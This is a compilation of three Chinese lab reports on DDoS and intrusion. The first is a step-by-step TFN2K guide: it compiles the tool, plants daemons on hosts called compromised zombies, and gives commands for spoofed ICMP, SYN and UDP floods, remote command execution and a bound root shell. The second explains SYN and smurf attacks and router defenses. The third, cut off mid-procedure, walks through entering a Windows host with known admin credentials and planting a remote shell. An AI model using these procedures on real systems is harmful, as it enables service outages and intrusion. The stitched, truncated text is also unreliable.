DDOS攻击实验报告

篇一：ddos攻击实验

这里主要介绍tfn2k，因为它最著名嘛！主要分为使用说明，攻击实例，程序分析，防范手段等几部分。

这里主要介绍tfn2k，因为它最著名嘛！主要分为使用说明，攻击实例，程序分析，防范手段等几部分。

简介：

tfn被认为是当今功能最强性能最好的dos攻击工具，几乎不可能被察觉。作者发布这个工具的出发点是什么呢？作者向你保证它不会伤害公司或个人。但是它会吓一吓那些不关心系统安全的人，因为现在精密的工具被不断改善，并且被私人持有，他们许多都是不可预测的。现在是每一个人都清醒的时候了，每一个人都应该意识到假如他不足够关心他的安全问题，最坏的情形就会发生。

因此这个程序被设计成大多数的操作系统可以编译，以表明现在的操作系统没有特别安全的，包括windows,solaris,linux及其他各种unix.

特点描述：

tfn使用了分布式客户服务器功能，加密技术及其它类的功能，它能被用于控制任意数量的远程机器，以产生随机匿名的拒绝服务攻击和远程访问。

此版本的新特点包括：

1。功能性增加:

为分布式执行控制的远程单路命令执行

对软弱路由器的混合攻击

对有ip栈弱点的系统发动targa3攻击

对许多unix系统和winnt的兼容性。

2。匿名秘密的客户服务器通讯使用：

假的源地址

高级加密

单路通讯协议

通过随机ip协议发送消息

诱骗包

编译：

在编译之前，先要编辑src/makefile文件修改选项符合你的操作系统。建议你看一下src/config.h然后修改一些重要的缺省值。

一旦你开始编译，你会被提示输入一个8--32位的服务器密码。如果你使用require_pass 类型编译，在使用客户端时你必须输入这个密码。

安装：

tfn服务器端被安装运行于主机，身份是root（或euid root）。它将用自己的方式提交系统配置的改变，于是如果系统重启你也得重启。一旦服务器端被安装，你就可以把主机名加入你的列表了（当然你也可以联系单个的服务器端）。tfn的客户端可以运行在shell(root)和windows命令行(管理员权限需要在nt上).

使用客户端：

客户端用于联系服务器端，可以改变服务器端的配置，衍生一个shell,控制攻击许多其它的机器。你可以tfn -f file从一个主机名文件读取主机名，也可以使用tfn -h hostname联系一个服务器端。

缺省的命令是通过杀死所有的子线程停止攻击。命令一般用-c .

请看下面的命令行描述。选项-i需要给命令一个值，分析目标主机字符串，这个目标主机

字符串缺省用分界符@。

当使用smurf flood时，只有第一个是被攻击主机，其余被用于直接广播。

id 1 -反欺骗级：服务器产生的dos攻击总是来源于虚假的源地址。通过这个命令，你可以控制ip地址的哪些部分是虚假的，哪些部分是真实的ip。

id 2 -改变包尺寸：缺省的icmp/8,smurf,udp攻击缺省使用最小包。你可以通过改变每个包的有效载荷的字节增加它的大小。

id 3 - 绑定root shell:启动一个会话服务，然后你连接一个指定端口就可以得到一个root shell。 id 4 - udp flood 攻击：这个攻击是利用这样一个事实：每个udp包被送往一个关闭的端口，这样就会有一个icmp不可到达的信息返回，增加了攻击的能力。

id5 - syn flood 攻击：这个攻击有规律的送虚假的连接请求。结果会是目标端口拒绝服务，添瞒tcp连接表，通过对不存在主机的tcp/rst响应增加攻击潜力。

id 6 - icmp响应(ping)攻击：这个攻击发送虚假地址的ping请求，目标主机会回送相同大小的响应包。

id 7 - smurf 攻击：用目标主机的地址发送ping请求以广播扩大，这样目标主机将得到回复一个多倍的回复。

id 8 - mix攻击：按照1:1:1的关系交替的发送udp,syn,icmp包，这样就可以对付路由器，其它包转发设备，nids,sniffers等。

id 9 -targa3攻击

id 10 - 远程命令执行：给予单路在服务器上执行大量远程命令的机会。更复杂的用法请看4.1节。

更多的选项请看命令行帮助。

使用tfn用于分布式任务

using tfn for other distributed tasks

依照cert的安全报告，新版本的ddos工具包含一个最新流行的特点：软件的自我更新。 tfn 也有这个功能，作者并没有显式的包含这个功能。在id 10远程执行命令中给予用户在任意数量远程主机上以批处理的形式执行同样shell命令的能力。这同时也证明了一个问题：ddos 等类似的分布式网络工具不仅仅简单的用于拒绝服务，还可以做许多实际的事情。

使用方法：

usage: ./tfn

uses a random protocol as default

[-d n] send out n bogus requests for each real one to decoy targets

[-s host/ip] specify your source ip. randomly spoofed by default, you need

to use your real ip if you are behind spoof-filtering routers

[-f hostlist] filename containing a list of hosts with tfn servers to contact [-h hostname] to contact only a single host running a tfn server

[-i target string] contains options/targets separated by @, see below

[-p port] a tcp destination port can be specified for syn floods

1 - change ip antispoof-level (evade rfc2267 filtering)

usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed)

2 - change packet size, usage: -i

3 - bind root shell to a port, usage: -i

4 - udp flood, usage: -i victim@victim2@victim3@...

5 - tcp/syn flood, usage: -i victim@... [-p destination port]

6 - icmp/ping flood, usage: -i victim@...

7 - icmp/smurf flood, usage: -i victim@broadcast@broadcast2@...

8 - mix flood (udp/tcp/icmp interchanged), usage: -i victim@...

9 - targa3 flood (ip stack penetration), usage: -i victim@...

继续上一次的文章，这一次是攻击测试。

测试环境：

共有5台机器，是在五台redhat linux6.2上测试的。

192.168.111.1

192.168.111.2

192.168.111.3

192.168.111.55

192.168.111.88

测试目的：？？？？？（感受一下yahoo怎么被攻击的）

简要介绍：

我们的测试目的是用192.168.111.55指挥192.168.111.1,192.168.111.2,192.168.111.3 三台机器对192.168.111.88发动攻击。(实际攻击中就不止三台了。)

因此我们的步骤如下：

0。黑客攻击时事先要控制192.168.111.1,192.168.111.2,192.168.111.3,192.168.111.55这四台机器。也就是我们俗称的“肉鸡”。

1。编译代码。2。在192.168.111.1,192.168.111.2,192.168.111.3上安装td。

3。在192.168.111.55安装tfn。

4。由192.168.111.55指挥192.168.111.1,192.168.111.2,192.168.111.3

对192.168.111.88发动攻击。

5。攻击结束。

详细步骤：

0。黑客攻击时事先要控制192.168.111.1,192.168.111.2,192.168.111.3,192.168.111.55这四台机器。

这一步我就不说了，大家一定有办法。。。

1。编译代码。

假设在192.168.112.55上。。。

首先一定要有root权限

$su

#

解开文件:

#tar zxvf tfn2k.tgz

#cd tfn2k

如果你不是linux或者bsd请修改src下的makefile文件。(有一网友问佳佳，solaris为什么不行。如果你修改了makefile,把linux改成了solaris仍然不行，佳佳也不知道了，因为佳佳没有solaris的测试环境。)

#make

make过程中会让你输入一个密码，8--32位的。那就输入一个吧，将来tfn和td联系时需要这个密码。我输入的是：aaaabbbb

make完成你会发现，多了两个可执行文件:tfn,td

2。在192.168.111.1,192.168.111.2,192.168.111.3上安装td。

#ftp 192.168.111.1

fpt>put td

ftp>by

ftp的具体步骤我就不说了，大家一定都知道。

同样方法：ftp 192.168.111.2

ftp 192.168.111.3

然后在分别在192.168.111.1,192.168.111.2,192.168.111.3上

#./td

注意一定要有root权限，否则无法运行。

3。在192.168.111.55安装tfn。

由于我们是在192.168.111.55上编译的，tfn就已经在了。

4。由192.168.111.55指挥192.168.111.1,192.168.111.2,192.168.111.3对192.168.111.88发动攻击。

好了，我们终于完成了准备工作，攻击可以开始了。。。

我现在在192.168.111.55的/tfn2k/目录下。。。

我们需要编辑一个文件列表。#vi hosts.txt

文件第一行输入：192.168.111.1

文件第二行输入：192.168.111.2

文件第三行输入：192.168.111.3

这就是控制文件列表。

然后我们测试一下连接。

在192.168.111.55上。。。

下面的命令意思是：在hosts.txt文件中的机器上执行远程命令“mkdir jjgirl”,其中-c 10表示执行远程命令。执行完这个命令就会在那三台机器上都建立jjgirl目录。当然你可以随便执行其他的命令。

#./tfn -f hosts.txt -c 10 -i mkdir jjgirl

protocol : random

source ip : random

client input : list

password verification: （这时我们输入密码：aaaabbbb）

sending out packets: .

好了，完成。

然后我们在192.168.111.1上执行：

#find / -name jjgirl -print

好，找到了。说明我们连接成功。。。

下面开始正式攻击了。。。

你可以在192.168.111.1上：

#./ntop

运行ntop查看流量。

先来icmp攻击

#./tfn -f hosts.txt -c 6 -i 192.168.111.88（十分钟，192.168.111.88就死机了）

重启，接着测试。。。

syn/tcp攻击：

#./tfn -f hosts.txt -c 5 -i 192.168.111.88 -p 80

#./tfn -f hosts.txt -c 4 -i 192.168.111.88

icmp/tcp/udp轮流攻击：篇二：计算机安全技术大作业实验报告-ddos攻击的原理及防范上海电力学院

计算机安全技术大作业

题目: ddos攻击的原理及防范

学号：学生姓名：院系：专业：班级：

2012 年 5月 28日摘要：

ddos攻击手段是在传统的dos攻击基础之上产生的一类攻击方式，他借助于客户/服务器技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动dos攻击，从而成倍的提高拒绝服务攻击的威力。

关键字：

ddos攻击，dos攻击，syn攻击，smurf攻击，攻击原理，防御办法，傀儡机

引言：

ddos是distributed denial of service的简写，意为分布式拒绝服务攻击，是对dos（denial of service）拒绝服务攻击的发展。这里，我们先来了解一下什么是dos。

正文：

【dos攻击简介】

dos攻击的目的是使目标计算机或网络无法提供正常的服务。最常见的dos攻击有计算机网络带宽攻击和连通性攻击。带宽攻击就是以庞大的通信量冲击网络，使所有可用的网络资源都被耗尽，最后导致合法用户的请求无法通过；类似于一大群人同时冲向一个安全出口，则会造成安全出口的阻塞，导致其他人都无法通过出口。而连通性攻击是指使用大量的连接请求冲击服务器，使所有可用的操作系统资源都被消耗殆尽，最终计算机无法再处理合法用户的请求；即服务器忙于处理攻击者的连接请求而无暇理睬合法用户的正常请求，此时从合法用户的角度来看就是服务器失去响应。

smurf攻击（带宽攻击）

smurf攻击并不直接对目标主机发送服务请求包，攻击者在远程机器上发送icmp答应请求ping服务，但这个ping命令的目的地址不是某个主机的ip地址，是某个网络的广播地址（即目标ip地址为“ff·ff·ff·ff”），并且这个ping命令的源地址被伪造成了将要攻击的主机ip地址。这样，收到广播ping命令后的主机，都会按数据包中所谓的源ip地址返回请求信息，向被攻击的主机发送echo响应包作为回答。大量同时返回的echo响应数据包会造成目标网络严重拥塞、丢包，甚至完全崩溃。

syn攻击（连通性攻击）

syn攻击是利用现有tcp/ip协议族的设计弱点和缺陷。在tcp/ip协议的三次握手协议过程如下：

（1）第一次握手。客户端发送syn包到服务器，向服务端提出连接请求，这时

tcp syn标志置位（syn=j），客户端在tcp包头的序列号区中插入自己的isn。

（2）第二次握手。服务器收到客户的请求信息，必须回应一个确认信号，确认

客户的syn(ack标志置位为j+1)，同时也发送一个自己的syn包（syn置位为k），即syn+ack 包，此时服务器进入syn_recv状态。

（3）第三次握手。客户端收到服务器的syn+ack包，想服务器发送确认包ack

（ack置位为k+1），此包发送完毕标志建立了完整的tcp连接，客户端和服务器进入established状态，可以开始全双工模式的数据传输过程。假设一个用户想服务器发送了syn 报文后突然死机或掉线，那么服务器在发出syn+ack应答报文后是无法收到客户端的ack报

文的（第三次握手无法完成），在这种情况下服务器端一般会重试（再次发送syn+ack）给客户端，并且等待一段时间后丢弃这个未完成的连接，这段时间的长度一般是30秒~2分钟。如果一个用户出现异常导致服务器的一个线程等待1分钟并不是大问题，但如果有一个恶意攻击者大量模拟这种情况，服务器端为了维护一个非常大的半连接列表而消耗非常多的资源——数以万计的半连接，即使是简单的保存及遍历也会非常消耗很多的cpu时间和内存，何况还要不断对这个半连接列表中的ip进行syn+ack的重试。如果服务器的tcp/ip栈不够强大，最后的结果往往是堆栈溢出崩溃——及时服务器的系统足够强大，服务器端也会忙于处理攻击者伪造的tcp连接请求而无暇理睬客户的正常请求。这种情况叫做服务器端收到了syn flood攻击（syn洪水攻击）。

【ddos攻击原理简介】

ddos攻击手段是在传统的dos攻击基础之上产生的一类攻击方式。单一的dos攻击一般是采用一对一方式的，它的攻击方法说白了就是单挑，是比谁的机器性能好、速度快。当攻击目标cpu速度低、内存小或者网络带宽小等等各项性能指标不高时，他的效果是明显的。但随着计算机处理能力的迅速增长，内存大大增加，cpu运算能力越来越强大，这使得dos攻击的困难程度加大了。被攻击者对恶意攻击包的抵抗能力加强的不少。这时候分布式的拒绝服务攻击手段就应运而生了。所谓分布式拒绝服务（ddos）攻击是指借助于客户/服务器技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动dos攻击，从而成倍的提高拒绝服务攻击的威力。如图，一个比较完善的ddos攻击体系分成四大部分。

第1部分：由黑客操控的主控计算机；第2部分：由黑客直接控制的控制傀儡机；第3部分：由控制傀儡机控制的攻击傀儡机；第4部分：受害者。其中第2部分可由多台控制傀儡机构成。对受害者来说，ddos的实际攻击包是从第3部分攻击傀儡机上发出的，第2部分的控制傀儡及只发命令而不参与实际的攻击。对第2和第3部分计算机，黑客有控制权或者是部分的控制权，并把相应的ddos程序传到这些平台上，这些程序与正常程序一样运行，并等待来自黑客的指令，通常这些程序还会利用各种手段隐藏自己不被别人发现。在平时，这些傀儡机器并没有什么异常，但一旦黑客连接到它们进行控制，并发出指令的时候，攻击傀儡机就成为打手去对受害者发起攻击了。

一般情况下黑客不直接控制第3部分的攻击傀儡机，而要从控制傀儡机上中转一下，这就导致ddos攻击难以追查。攻击者为了反侦察，都会清理日志擦掉脚印。狡猾的攻击者不会清空日志，这样容易被人发觉，黑客们会挑有关自己不良行为的日志项目删掉，让人看不到异常情况。这样可以长时间的利用控制傀儡机。在傀儡机上清理日志是一项庞大的工程，所以黑客一般控制少数的控制傀儡机就足够了，而控制傀儡机一台就可以控制几十台攻击机。【ddos的防范】

对于smurf类型ddos攻击的防范

首先，千万不能让自己网络里的人发起这样的攻击。在smurf攻击中，有大量的源欺骗的ip 数据包离开了第一个网络。所以我们通过在局域网的边界路由器上使用输出过滤，从而阻止自己网络中其他人向局域网外发送的源欺骗smurf攻击。在路由器上增加这类过滤规则的命令是：

【access-list 100 permit ip {你的网络号} {你的网络子网掩码} any】

【access-list 100 deny ip any any】

其次，停止自己的网络作为中间代理。如果没有必须要向外发送广播数据包的情况，就可以在路由器的每个接口上设置禁止直接广播，命令如下：

【no ip directed-broadcast】

如果自己所在的网络比较大，具有多个罗尤其，那么可以在边界路由器上使用以下命令：【ip verify unicast reverse-path】

让路由器对具有相反路径的icmp欺骗数据包进行校验，丢弃那些没有路径存在的包。最好是运行cisco快速转发，或者其他相应的软件。这是因为在路由器的cef表中，列出了该数据包所到达网络接口的所有路由项，如果没有该数据包源ip地址的路由，路由器将丢弃该数据包。例如，路由器接收到一个源ip地址为1.2.3.4的数据包，如果cef路由表中没有为ip 地址1.2.3.4提供任何路由（即反向数据包传输时所需的路由），则路由器会丢弃它。

对于syn类型ddos攻击的防范：

到目前为止，进行syn类型的ddos攻击的防御还是比较困难的。这种攻击的特点是它利用了tcp/ip协议的漏洞，除非你不用tcp/ip，才有可能完全抵御住ddos攻击。

虽然它难于防范，但防止ddos并不是绝对不可行的事情。互联网的使用者是各种各样的，与ddos做斗争，不同的角色有不同的任务：

? 企业网管理员

? isp、icp管理员

? 骨干网络运营商

? 企业网管理员：篇三：网络安全实验报告

哈佛大学计算机与信息学院

课程名称：姓名：系：专业：年级：学号：指导教师：职称：信息工程类

实验报告

网络安全

天贵あ→黄泉↑霸气的一号

网络工程系网络工程专业 2009级 111111111111

纪晓岚博士

2012年1 月 3

日

实验项目列表实验一：常用网络攻防命令使用

一．实验目的和要求实验目的：

1.了解网络访问的大致步骤和方法

2.熟练使用pstools中的相关程序，能够使用该套工具进行基本访问和日志清除

3.掌握net命令组的使用方法，能够使用net命令组进行基本的访问

4.学会使用radmin 进行文件上传和下载实验要求：

第一阶段：1.熟悉pstools工具使用方法. 2.熟悉本章介绍的各种常用dos命令. 3.学会使用radmin进行文件上传下载.

第二阶段：1.已知某台windows操作系统的计算机管理用户名(csadmin)和密码(testadmin). 使用如下方法入侵该计算机(获得shell，在对方计算机中安装远程控制程序进行屏幕控制):a.仅使用windows的自带命令和远程控制程序;b.仅使用pstools中的相关工具和远程控制程序.

2.获得对方每个盘的详细目录结构，并使用tftp传到本地.

3.从传回本地的详细目录结构中找到文件security.dat所在位置，并传回本地. 第三阶段：1.卸载对方系统中的远程控制程序 2.完成选择题

二．实验原理

三．主要仪器设备（实验用的软硬件环境）pstools工具

radmin工具 cshell实验所需工具

四.实验内容与步骤

1、基于

windows命令的远程访问

已知某台windows操作系统的计算机管理用户名为：091154001和密码为：001 第一步:建立ipc连接

第二步:将被远程访问电脑的c盘映射为本地的z盘或者直接复制文件至被远程访问电脑的c 盘.

将被远程访问电脑的c盘映射为本地的z盘(建议使用).

直接把cshell.exe复制至被远程访问电脑的c盘下.